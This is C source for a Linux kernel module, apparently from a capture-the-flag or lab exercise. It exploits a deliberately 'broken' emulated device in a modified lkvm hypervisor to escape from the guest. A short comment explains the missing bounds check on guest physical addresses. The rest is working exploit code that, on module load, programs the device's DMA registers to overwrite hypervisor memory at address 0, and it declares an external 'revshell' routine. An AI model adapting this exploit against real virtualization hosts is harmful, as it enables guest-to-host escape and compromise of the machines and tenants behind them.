#include <linux/module.h>
#include <linux/slab.h>
#include <linux/dma-mapping.h>
#include <asm/io.h>

MODULE_LICENSE("Dual BSD/GPL");
extern unsigned long system;
extern void revshell(void);

/* Analysis of the bug: the 'broken' device in the modified lkvm does not check that the
 * guest physical address is actually contained in the emulated guest physical memory,
 * and can therefore be used by the guest to both leak and overwrite lkvm memory.
 */

unsigned long const guestmem = 0x7fffe3d9c000;

/* these come from the definition of the 'broken' device */
#define BROKEN_BASE	0x100
#define	BROKEN_SNR	(BROKEN_BASE + 0)
#define BROKEN_CMD	(BROKEN_BASE + 4)
#define BROKEN_LOMEM	(BROKEN_BASE + 8)
#define BROKEN_HIMEM	(BROKEN_BASE + 12)
#define BROKEN_DMA_OUT	2
#define BROKEN_DMA_IN	1
#define BROKEN_SECSZ	512

/* we install and trigger the exploit when the module is loaded, so we write
 * everything in the exploit_init() function.
 */
static int exploit_init(void) {
	unsigned long target = -guestmem; // cause a write to address 0 in the hypervisor

	outl(0, BROKEN_SNR);
	outl(target, BROKEN_LOMEM);
	outl(target >> 32, BROKEN_HIMEM);
	outl(BROKEN_DMA_IN, BROKEN_CMD);
	return 0;
}

static void exploit_exit(void) {
}

module_init(exploit_init);
module_exit(exploit_exit);
